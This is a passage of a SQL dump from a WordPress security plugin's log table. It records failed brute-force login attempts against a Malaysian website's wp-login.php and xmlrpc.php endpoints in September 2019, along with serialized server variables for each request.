14:59:38',18255200,19554560,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(23878,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"54700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5R1@oTLkHKFi2qF7E-WwAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568559575.3496\";s:12:\"REQUEST_TIME\";s:10:\"1568559575\";}}','notice','2019-09-15 14:59:36','2019-09-15 14:59:35',17737736,19228064,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23877,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"49610\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5PiuoTLkHKFi2qF7E98wAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568558986.7851\";s:12:\"REQUEST_TIME\";s:10:\"1568558986\";}}','notice','2019-09-15 14:49:48','2019-09-15 14:49:47',18254496,19552464,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(23876,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"49168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5Ph@oTLkHKFi2qF7E92AAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568558983.2941\";s:12:\"REQUEST_TIME\";s:10:\"1568558983\";}}','notice','2019-09-15 14:49:45','2019-09-15 14:49:43',17903904,19228848,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(23875,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"49168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5Ph@oTLkHKFi2qF7E92AAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568558983.2941\";s:12:\"REQUEST_TIME\";s:10:\"1568558983\";}}','notice','2019-09-15 14:49:44','2019-09-15 14:49:43',17742264,19228848,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(23874,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"51024\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5MdOoTLkHKFi2qF7E8cwAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568558196.168\";s:12:\"REQUEST_TIME\";s:10:\"1568558196\";}}','notice','2019-09-15 14:36:37','2019-09-15 14:36:36',18253784,19551680,'https://bintara.com.my/xmlrpc.php',1,0,'204.15.133.176'),(23873,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"204.15.133.176\";s:11:\"REMOTE_PORT\";s:5:\"50528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5MceoTLkHKFi2qF7E8cgAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568558193.3011\";s:12:\"REQUEST_TIME\";s:10:\"1568558193\";}}','notice','2019-09-15 14:36:34','2019-09-15 14:36:33',17737352,19227000,'https://bintara.com.my/wp-login.php',1,0,'204.15.133.176'),(23872,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"59104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5J171rBLb0GV3O7mS2jwAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568557527.9934\";s:12:\"REQUEST_TIME\";s:10:\"1568557527\";}}','notice','2019-09-15 14:25:29','2019-09-15 14:25:28',18255136,19551264,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(23871,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"58276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5J1GCCaIOMm5l5jJEcbgAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568557524.8544\";s:12:\"REQUEST_TIME\";s:10:\"1568557524\";}}','notice','2019-09-15 14:25:26','2019-09-15 14:25:25',17739464,19230048,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(23870,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"39272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5EfL1rBLb0GV3O7mS18AAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568556156.6265\";s:12:\"REQUEST_TIME\";s:10:\"1568556156\";}}','notice','2019-09-15 14:02:38','2019-09-15 